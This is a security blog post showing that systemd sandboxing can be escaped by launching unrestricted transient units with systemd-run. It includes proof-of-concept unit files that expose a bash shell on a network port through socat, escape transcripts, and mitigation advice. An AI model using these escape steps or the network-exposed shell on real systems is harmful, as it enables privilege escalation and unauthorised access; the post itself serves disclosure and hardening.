Today, the most popular Linux service manager is systemd.

Services are defined in units located in defined directories. Package units are in /usr/lib/systemd/system and administrators add their units to /etc/systemd/system. In addition to the system service manager, systemd provides a user service manager, for user services. User units are in other directories, including in the user's home directory.

System and user services can be sandboxed with many different properties, including restrictions on the file system, device access, network interfaces, and so on.

TL;DR

Because (1) transient units make it possible to create a new service without writing a configuration file, (2) read-only access to the systemd sockets doesn't prevent communication with them, and (3) systemd access control relies on polkit only, a read-only filesystem doesn't prevent the creation of new services with more privileges than the current one.

Access control is based exclusively on polkit, which only works with the system service manager and authorizes all calls from root. If you write units, do not run your system units as root, and add ProtectHome=true to your service units.

Otherwise, the systemd unit sandboxes are trivially escaped. If you really need to run as root, you can deny access to the systemd sockets as a workaround. This isn't a bug, but it isn't explicitly documented either.

If you are using another sandbox system, be aware that these sockets can also be used to escape it.

Introduction

As mentioned recently, I've reinstalled my laptop. In my previous setup, I was using container-based isolation for various shell environments. I had a script to generate new toolbox containers with some isolation for the home and other directories. No surprise, this time I wanted to switch to a systemd-based isolation. (I will share the details in another post.)

systemd-run is a tool to run services on-demand using transient units, temporary units managed by systemd. It's a useful tool to do some tests, or schedule tasks for example. Every time a new interactive shell is started with systemd-run (systemd-run --user -S), an orange circle is added to the title of the terminal window (🟠 ~). Other systemd features use transient units, like systemd-mount: it starts a temporary unit that mounts a device on the filesystem.

I was using systemd-run to test some sandbox properties (--property ProtectSystem=strict) until my window ended up with 2 circles in its title (🟠🟠 ~).

A few questions then arise: Does systemd somehow check the restrictions of the calling service before starting a transient unit, so that a new service can only gain restrictions (and not lose them)? Does this concern only units managed by the user service manager, or units managed by the system service manager too? Did I miss something?

Impacted configurations

Transient units are temporary services managed by the service manager. They don't require any config file. So, as soon as we can talk to systemd, it is possible to start new units, even if we don't have write access to the config directories.
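As a rough illustration of the paragraph above, the sketch below assembles a systemd-run command line that starts a transient unit with sandboxing properties and no unit file. The helper name run_transient and the DRY_RUN switch are hypothetical conveniences, not part of systemd; the flags it passes (--user, --wait, --pipe, --collect, --property) are existing systemd-run options.

```shell
# Hypothetical helper: run a command in a transient user unit.
# Usage: run_transient "Prop=value [Prop=value ...]" command [args...]
# With DRY_RUN=1 the command line is printed instead of executed.
# The body runs in a subshell so its variables do not leak to the caller.
run_transient() (
    props=$1
    shift
    flags=""
    for p in $props; do
        flags="$flags --property=$p"
    done
    # $flags is left unquoted on purpose: it holds one flag per word.
    set -- systemd-run --user --wait --pipe --collect $flags -- "$@"
    if [ "${DRY_RUN:-0}" = 1 ]; then
        echo "$*"
    else
        "$@"
    fi
)

# Dry run: only shows what would be sent to the user service manager.
DRY_RUN=1 run_transient "ProtectHome=read-only" touch "$HOME/probe"
```

Nothing in this command line depends on write access to a unit directory: the whole unit definition travels over the socket to the service manager.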

It could be more explicit, but the Sandboxing section of the systemd.exec man page contains a sentence about the ability to talk to systemd on a read-only system:

Note that the various options that turn directories read-only (such as ProtectSystem=, ReadOnlyPaths=, ...) do not affect the ability for programs to connect to and communicate with AF_UNIX sockets in these directories. These options cannot be used to lock down access to IPC services hence.
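To see which of these sockets are visible from inside a sandboxed process, a small check like the following can help. It is only a sketch: the helper name list_sockets is hypothetical, the paths assume the usual /run layout (the two "private" paths are my assumption about where the managers listen, in addition to the bus sockets mentioned in this post), and finding a socket does not prove that a connection would be accepted.

```shell
# Print each argument that exists and is a UNIX socket.
# Existence is only a hint: it says nothing about access control.
list_sockets() {
    for path in "$@"; do
        if [ -S "$path" ]; then
            echo "$path"
        fi
    done
}

uid=$(id -u)
list_sockets \
    /run/systemd/private \
    /run/dbus/system_bus_socket \
    "/run/user/$uid/bus" \
    "/run/user/$uid/systemd/private"
```

Run inside a unit with ProtectSystem=strict, this would be expected to list the same system sockets as outside of it, since a read-only mount does not hide them.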

Polkit is used by systemd for access control. Polkit is a toolkit that lets unprivileged processes talk to privileged ones. It authorizes any call coming from root, and it isn't used by the systemd user service manager (which runs as the user, so isn't privileged).

Given these three points, there are three possible outcomes:

  • systemd controls the caller service, and prevents sandboxed services from launching transient units with more privileges than their own
  • systemd controls the caller service, and prevents sandboxed services from launching transient units
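  • systemd relies exclusively on polkit for access control, and no other controls are performed

A quick test as root, in a transient unit restricted with DeviceAllow= and ProtectSystem=, settles the question:
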
[root@archlinux ~]# systemd-run --property DeviceAllow=/dev/vda1 --property ProtectSystem=yes -S
Running as unit: run-p503-i803.service; invocation ID: 4d8fd6bf06534e50b5b478d209c53d7b
Press ^] three times within 1s to disconnect TTY.

[root@archlinux root]# mount /dev/vda2 /mnt
mount: /mnt: fsconfig() failed: /dev/vda2: Can't open blockdev.
       dmesg(1) may have more information after failed mount system call.

[root@archlinux root]# systemd-mount /dev/vda2 /mnt    # Accepted
Started unit mnt.mount for mount point: /mnt

It turns out that systemd relies exclusively on polkit for all access controls. And because polkit isn't used for user units, and because polkit accepts all requests from root, user services and services running as root are able to launch new systemd services with more privileges than their own.

In other words, ProtectSystem=strict alone does not prevent the process from trivially gaining full access to the system through systemd, without any sandbox attributes.

If the service runs as another user, but doesn't set ProtectHome=true (implied by DynamicUser=true) or deny access to the systemd sockets (InaccessiblePaths=/run/user/<UID>/bus), then the user service manager can be used to start a new service without sandbox attributes.

POC

These tests can be performed with transient units, using systemd-run, but in order to confirm that these tests apply to real units, we can use a unit file that exposes a bash shell to the network with socat.

To illustrate the problem, we can try different configurations with sandboxing options:

  • A system unit running as root
  • A system unit running as a user (the escape works only while that user is logged in)
  • A user unit

Below are two examples, one for the system unit running as root, the other for the user unit.

System Unit - Root

In this example, the unit is run by the system service manager as root, with 3 sandboxing options: ProtectSystem=strict, ProtectHome=true and InaccessiblePaths=/etc/secret. This unit could be used to sandbox a service that requires certain privileges.

This is a common sandbox configuration.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
UMask=0007
ProtectSystem=strict
ProtectHome=true
InaccessiblePaths=/etc/secret

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=multi-user.target

The service can escape the sandbox with systemd-run -S. The process is correctly sandboxed at first: /etc/secret is not accessible. It becomes readable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 16:05:18 socat[134374] W address is opened in read-write mode but only supports read-only
[root@poc /]# cat /etc/secret/poc
cat: /etc/secret/poc: No such file or directory

[root@poc /]# systemd-run -S
Running as unit: run-p4123-i134849.service
Press ^] three times within 1s to disconnect TTY.
[root@poc /]# cat /etc/secret/poc
poc

User Unit

In this example, the unit is run by the user service manager, with a sandboxing option: ProtectHome=read-only. This unit could be used to have a user service, that is expected to read data from the home directory.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
ProtectHome=read-only

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=default.target

The service can escape the sandbox with systemd-run --user -S. The process is correctly sandboxed at first: $HOME is read-only. It becomes writable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 11:36:04 socat[46527] W address is opened in read-write mode but only supports read-only
[poc@poc ~]$ touch a
touch: cannot touch 'a': Read-only file system

[poc@poc ~]$ systemd-run --user -S
Running as unit: run-p5131-i46889.service
Press ^] three times within 1s to disconnect TTY.

[poc@poc ~]$ touch a
[poc@poc ~]$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  a

Escaping a system unit running as a user works the same way, as long as that user is logged in.
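For that third case, one practical detail may matter: a system unit running as a user does not necessarily inherit the variables that systemd-run --user relies on to find the user manager. The sketch below assumes they are missing and that the runtime directory follows the usual /run/user/<UID> layout; user_manager_env is a hypothetical helper name, and the script only prints the command rather than running it.

```shell
# Hypothetical helper: print the environment that points at the user
# manager of the given UID (assumes the usual /run/user/<UID> layout).
user_manager_env() {
    echo "XDG_RUNTIME_DIR=/run/user/$1"
    echo "DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/$1/bus"
}

# The bus socket only exists while the user has a running user manager,
# which is why the escape depends on the user being logged in.
uid=$(id -u)
if [ -S "/run/user/$uid/bus" ]; then
    echo "user bus found; an escape attempt would look like:"
    echo "env $(user_manager_env "$uid" | tr '\n' ' ')systemd-run --user -S"
else
    echo "no user bus at /run/user/$uid/bus"
fi
```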

Conclusion

If you look at your own system, you'll find many service units running as root with ProtectSystem=yes|strict|true. The possibility of starting arbitrary, non-sandboxed services on a read-only file system doesn't seem to be widely known.
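To get an idea of how many units on a given machine match this pattern, something like the following sketch can be used. The helper name is_root_readonly is hypothetical, and the criteria are a simplification: a unit is reported when its User= property is empty or root and ProtectSystem= is enabled. It does not check whether the unit also hides the systemd sockets.

```shell
# Succeed when the unit runs as root (empty User= or "root")
# and has ProtectSystem= enabled in any of its modes.
is_root_readonly() {
    user=$1
    protect=$2
    case $user in
        ''|root) ;;
        *) return 1 ;;
    esac
    case $protect in
        yes|full|strict) return 0 ;;
        *) return 1 ;;
    esac
}

# List running services and print those matching the pattern.
if command -v systemctl >/dev/null 2>&1; then
    systemctl list-units --type=service --state=running --plain --no-legend 2>/dev/null |
    while read -r unit rest; do
        user=$(systemctl show "$unit" --property=User --value 2>/dev/null)
        protect=$(systemctl show "$unit" --property=ProtectSystem --value 2>/dev/null)
        if is_root_readonly "$user" "$protect"; then
            echo "$unit"
        fi
    done
fi
```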

If you do some security tests and gain access to a sandboxed service, try systemd-run [--user] -S. You'll probably get more privileges.

If you're writing your own unit files, don't run your service as root, and use ProtectHome=true (or be very careful if you don't). If you must run as root, deny access to most of /run, and at least to /run/dbus/system_bus_socket.

I think systemd should gate the ability to run unrestricted transient units behind a property. This capability should be enabled by default unless certain sandbox attributes are declared. Then, if the capability is not granted, systemd could either apply the caller's context to the transient unit, or deny transient units altogether.

I opened a pull request (which may need some improvements) against systemd to apply the caller's context to transient units when the ability to execute an unrestricted transient unit is not granted. It was closed without any form of review, because this is how it works by design. By design, you can use systemd-mount to mount an unauthorized device.

At the very least, it might be a good idea to clarify this behavior in the documentation.
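As a starting point for the root case, the workaround could be expressed as a drop-in like the one printed by this sketch. The helper name print_socket_dropin is hypothetical. The /run/systemd/private entry is my own assumption (root tools may reach the manager through that socket as well as through the system bus), so treat the list as incomplete, and expect breakage if the service itself needs D-Bus.

```shell
# Hypothetical helper: print a drop-in that hides the sockets used to
# reach systemd. The leading "-" tells systemd to ignore missing paths.
print_socket_dropin() {
    cat <<'EOF'
[Service]
InaccessiblePaths=-/run/dbus/system_bus_socket
InaccessiblePaths=-/run/systemd/private
EOF
}

print_socket_dropin
```

The output can be pasted into the editor opened by systemctl edit for the unit in question, then verified from inside the service by retrying systemd-run -S.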